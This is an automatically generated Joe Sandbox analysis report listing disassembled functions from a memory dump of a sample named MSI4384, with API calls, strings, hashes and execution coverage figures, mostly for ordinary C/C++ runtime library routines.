                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task
                                                                    • String ID: false$true
                                                                    • API String ID: 118556049-2658103896
                                                                    • Opcode ID: 088484fcbf5a1e1059c76630b582b453641a39e23a84f076543adf6f9dbf141f
                                                                    • Instruction ID: 3d5706d47bfbd756578115621fa82b7b624988b1446361854469069d6bafbe10
                                                                    • Opcode Fuzzy Hash: 088484fcbf5a1e1059c76630b582b453641a39e23a84f076543adf6f9dbf141f
                                                                    • Instruction Fuzzy Hash: A251B4B1D003489FDB10DFA4C941BEEB7B8FF49304F14826EE845A7282E779A949CB55
                                                                    Function 00429890 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \\?\$\\?\UNC\
                                                                    • API String ID: 0-3019864461
                                                                    • Opcode ID: 4aa39e8d3053721ee4f6ff2b9307323dc69ec3954cffa6d9f6b09924fef695f1
                                                                    • Instruction ID: 0318d003217593dc4b7f96ce433d49812e863f5dc7a2e931a5d4b2b5be9c0ab7
                                                                    • Opcode Fuzzy Hash: 4aa39e8d3053721ee4f6ff2b9307323dc69ec3954cffa6d9f6b09924fef695f1
                                                                    • Instruction Fuzzy Hash: EE51D1B0E003149BDB24CF68D945BAEB7B4FF55318F50451EE441A7380D7B9AD88CB98
                                                                    Function 00463CFF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0045CCB0: HeapFree.KERNEL32(00000000,00000000,?,00463726,?,00000000,?,?,004639C7,?,00000007,?,?,00463E96,?,?), ref: 0045CCC6
                                                                      • Part of subcall function 0045CCB0: GetLastError.KERNEL32(?,?,00463726,?,00000000,?,?,004639C7,?,00000007,?,?,00463E96,?,?), ref: 0045CCD1
                                                                    • ___free_lconv_mon.LIBCMT ref: 00463D41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID: ("H$D!H
                                                                    • API String ID: 4068849827-4018331140
                                                                    • Opcode ID: 8b15a4c1e4031f574213b337e1b425d7f6d2e68298eb7f0449f6afa881b5e27a
                                                                    • Instruction ID: 6b8d5bd4e32f2af0125a3a5f21f8438148589d68a10e3d3e6ac118072b1e9276
                                                                    • Opcode Fuzzy Hash: 8b15a4c1e4031f574213b337e1b425d7f6d2e68298eb7f0449f6afa881b5e27a
                                                                    • Instruction Fuzzy Hash: F9319C716007409FEB21AF79D841B5773E9AF0035AF10441FE85887252EF39EE84C729
                                                                    Function 0044D426 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 0044D44B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 94c16877827929975e52cd9387917ddb710e98e2ab9a64114f2162572f7fa051
                                                                    • Instruction ID: 09a6c9bb6684d171f3c3f11aecfb17625d48a27784c3f4ce51119131d7329cb3
                                                                    • Opcode Fuzzy Hash: 94c16877827929975e52cd9387917ddb710e98e2ab9a64114f2162572f7fa051
                                                                    • Instruction Fuzzy Hash: 77418C71D00209AFEF16DF98CD81AEE7BB5FF48308F14819AF90467211D739A960DB59
                                                                    Function 00448160 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00448167
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 2088892359-2494171821
                                                                    • Opcode ID: 661c3396ef0e07b2d474561f6440614b613327bcd4d70e8e981d5711191c6a63
                                                                    • Instruction ID: 00d64df92202f8045887c6db33c5fcb1ec0423a89fcf8d618e57498ace614693
                                                                    • Opcode Fuzzy Hash: 661c3396ef0e07b2d474561f6440614b613327bcd4d70e8e981d5711191c6a63
                                                                    • Instruction Fuzzy Hash: 5F413931E001189FDF15EFA8D8919EE7BB5BF09314F10409EF811AB251DA389A16CB59
                                                                    Function 00443510 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443517
                                                                      • Part of subcall function 0043A71C: __EH_prolog3.LIBCMT ref: 0043A723
                                                                      • Part of subcall function 0043A71C: std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_LockitLockit::_std::_
                                                                    • String ID: %.0Lf$0123456789-
                                                                    • API String ID: 79917597-3094241602
                                                                    • Opcode ID: d4984a531732855606f4dd12892feee75bdc8aec7f8a7753a14a71ed2a78a2b4
                                                                    • Instruction ID: 377c7ce648a755e87bde54a0850ab5c2c33e92a1733c71abb43e1899b0aeb01c
                                                                    • Opcode Fuzzy Hash: d4984a531732855606f4dd12892feee75bdc8aec7f8a7753a14a71ed2a78a2b4
                                                                    • Instruction Fuzzy Hash: 43417B71900218EFCF15EFA4C9819EE7BB5BF08718F10005EF911AB255DB389E55CB99
                                                                    Function 00443840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443847
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 2088892359-2494171821
                                                                    • Opcode ID: d0e15fbecd8d64809b9315dce1f45d970918061a0be3b9b89a1f88a93ca13285
                                                                    • Instruction ID: db89e245c66d280be1fcddb7f6c7d3f38f863427928518629011aef8be29ab2d
                                                                    • Opcode Fuzzy Hash: d0e15fbecd8d64809b9315dce1f45d970918061a0be3b9b89a1f88a93ca13285
                                                                    • Instruction Fuzzy Hash: 19418C71A00218DFCF15EFA4D9819EEBBB5FF08714F10005AF811AB251DB38AE55CB59
                                                                    Function 0042D9A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %$+
                                                                    • API String ID: 589789837-2626897407
                                                                    • Opcode ID: 264951aec13ca3467353513c8002ff562d908dcc0f218bf2b4b28f093d3ed403
                                                                    • Instruction ID: b71e5364e07b39e8d590456432b46ce15cb55711d8700c98b6acb02befab2df7
                                                                    • Opcode Fuzzy Hash: 264951aec13ca3467353513c8002ff562d908dcc0f218bf2b4b28f093d3ed403
                                                                    • Instruction Fuzzy Hash: 402144725082848FD701CF08EC85F9BBBE9AF89308F04411EFA8547292C738D908C7A6
                                                                    Function 0042DA80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %$+
                                                                    • API String ID: 589789837-2626897407
                                                                    • Opcode ID: f2578ce1505f464aa780b99718992cd6a81cad126b7957c9fd2b73a9934da4c8
                                                                    • Instruction ID: 2b3a272dd367121918055af2d17a4fb17767e28929a6cb30fa01452b60d1ddf1
                                                                    • Opcode Fuzzy Hash: f2578ce1505f464aa780b99718992cd6a81cad126b7957c9fd2b73a9934da4c8
                                                                    • Instruction Fuzzy Hash: C821223160C3409FDB15CE28DC40F9BBBEAAB89314F04855EF98587381C779D90ACBA6
                                                                    Function 0042DB50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %$+
                                                                    • API String ID: 589789837-2626897407
                                                                    • Opcode ID: b33171a02fcc065d5639849d3a75b85f46c38fa63088e4410151be3e2eddac0f
                                                                    • Instruction ID: ed9c2a371f53c9a09aa3ebd3e02b597e402f51e54c9b6071884bfe02a98b96ed
                                                                    • Opcode Fuzzy Hash: b33171a02fcc065d5639849d3a75b85f46c38fa63088e4410151be3e2eddac0f
                                                                    • Instruction Fuzzy Hash: 382107316083449FD711CE28DC81B9B7BEAAF89314F04851EF99587381C779E90ACBA7
                                                                    Function 00428310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00428356
                                                                    • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,F3E52339), ref: 004283C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ConvertFreeLocalString
                                                                    • String ID: Invalid SID
                                                                    • API String ID: 3201929900-130637731
                                                                    • Opcode ID: 87be27dc2d7b60c4a19ed48b3c9b810b48e1c263081f5ba0972b1995276568c9
                                                                    • Instruction ID: bb784d3544b600b1a27f2083a0fa5c46e1f441931a68cf248f4c43bc2e17b977
                                                                    • Opcode Fuzzy Hash: 87be27dc2d7b60c4a19ed48b3c9b810b48e1c263081f5ba0972b1995276568c9
                                                                    • Instruction Fuzzy Hash: 1921D271A003159BDB14CF58D815BAFBBF8FF84B14F50465EE801A7381EBBA6A448BD4
                                                                    Function 0042C3E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C40B
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042C46E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3988782225-1405518554
                                                                    • Opcode ID: bf3037c5bafd30500f4da69ad2ae0614c02e57d7cc33b17c93cfd36ccb48722d
                                                                    • Instruction ID: 3dd4bfb7d5c68d821141f7dbd699e8e1366c9d27b3e6f2decf0ab0d515d5b067
                                                                    • Opcode Fuzzy Hash: bf3037c5bafd30500f4da69ad2ae0614c02e57d7cc33b17c93cfd36ccb48722d
                                                                    • Instruction Fuzzy Hash: EA2124B0805784EED721CF69C90478BBFF4EF19714F108A9ED09597B81D3B9A604CBA5
                                                                    Function 00434625 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: false$true
                                                                    • API String ID: 2427045233-2658103896
                                                                    • Opcode ID: 7fd8e849bce70241a135b236ac64ad463dfd3007f9189bf2f01fc3ef051093f5
                                                                    • Instruction ID: 3a52077450ae3834a4da6630aa80224d1e5035c7383ef5823a65d12f4858f8bd
                                                                    • Opcode Fuzzy Hash: 7fd8e849bce70241a135b236ac64ad463dfd3007f9189bf2f01fc3ef051093f5
                                                                    • Instruction Fuzzy Hash: 9511B1B1900740AEC725EF75D812B8AB7F4AB09300F04D91FE1A687341EB38E504CB59
                                                                    Function 004495A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07), ref: 004495B3
                                                                    • ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07,?,?,?,F3E52339), ref: 004495ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                    • String ID: t;H
                                                                    • API String ID: 17069307-3893116676
                                                                    • Opcode ID: 2ba1dc4a1ca8aa99cff28ffd911f7051c1eab897615898893fc41f89e41c5313
                                                                    • Instruction ID: 59fe798fd9767f30de85bc46b56c7c5cf836bdb23038d8b7b4d9c08705fa774b
                                                                    • Opcode Fuzzy Hash: 2ba1dc4a1ca8aa99cff28ffd911f7051c1eab897615898893fc41f89e41c5313
                                                                    • Instruction Fuzzy Hash: 81F02732100101EBD7215F15D804A6A77F4FB42736F30063FE8A543390C7781C42EB1A
                                                                    Function 00432345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00431020: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,F3E52339,?,0046B110,000000FF), ref: 00431047
                                                                      • Part of subcall function 00431020: GetLastError.KERNEL32(?,00000000,00000000,F3E52339,?,0046B110,000000FF), ref: 00431051
                                                                    • IsDebuggerPresent.KERNEL32(?,?,0047ECF8), ref: 00432378
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,0047ECF8), ref: 00432387
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00432382
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3511171328-631824599
                                                                    • Opcode ID: 26f8ebab5883fa38ed60feba729f355121e6176b6f938b93e9e216a39beda4fa
                                                                    • Instruction ID: 66bed2f2407c91b8e416fc163adeb1db7b508cfc14152b42ce79fc2161c7cacb
                                                                    • Opcode Fuzzy Hash: 26f8ebab5883fa38ed60feba729f355121e6176b6f938b93e9e216a39beda4fa
                                                                    • Instruction Fuzzy Hash: BAE0ED702007528FD360AF35F6047467AE4AF49744F00993FE886C6651E7FCE4488B5A
                                                                    Function 00426D20 Relevance: 5.2, APIs: 4, Instructions: 198memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000028,F3E52339,?,00000000,?,?,?,0046BB00,000000FF,?,004264FE,00000000,?), ref: 00426DD4
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,0046BB00,000000FF,?,004264FE,00000000), ref: 00426E8A
                                                                    • LocalFree.KERNEL32(?,F3E52339,00000000,0046B110,000000FF,?,00000000,00000000,0046BB00,?,F3E52339), ref: 00426F1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 3098330729-0
                                                                    • Opcode ID: fcd215298b63b42fca2ed53df20059b602437f38bdacc0d916965c743684c16b
                                                                    • Instruction ID: 3b2afa0a68da49750cdfe3d5398dacb7178196272d0e5158dcfb255e1c31721f
                                                                    • Opcode Fuzzy Hash: fcd215298b63b42fca2ed53df20059b602437f38bdacc0d916965c743684c16b
                                                                    • Instruction Fuzzy Hash: 0451B4B5B002159FDB18CF68D985BAEBBB5FB08314F61462EE815E3380D735AD04CB98
                                                                    Function 00424B00 Relevance: 5.2, APIs: 4, Instructions: 170memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,?,00000000,?), ref: 00424B56
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,?,00000000,?), ref: 00424BA0
                                                                    • LocalFree.KERNEL32(7FFFFFFE,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00424C22
                                                                    • LocalFree.KERNEL32(00000000,F3E52339,00000000,00000000,Function_0004B020,000000FF,?,?,00000000,?,?,00000000,?), ref: 00424CAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 2012307162-0
                                                                    • Opcode ID: 59a04b63619e00789a4857972edbcc58d2b0a7cd9c00cabc1b3980a9d1c55450
                                                                    • Instruction ID: ce6d07d9ef4ca01c8c12fee6897c2fec2c8236e75299513ea1ce2be4c4757405
                                                                    • Opcode Fuzzy Hash: 59a04b63619e00789a4857972edbcc58d2b0a7cd9c00cabc1b3980a9d1c55450
                                                                    • Instruction Fuzzy Hash: 155114726042209FC714DF29E881A6BB7E8EB89354F51063FF855D7390E734ED048B99

                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0.3%
                                                                    Total number of Nodes:327
                                                                    Total number of Limit Nodes:7
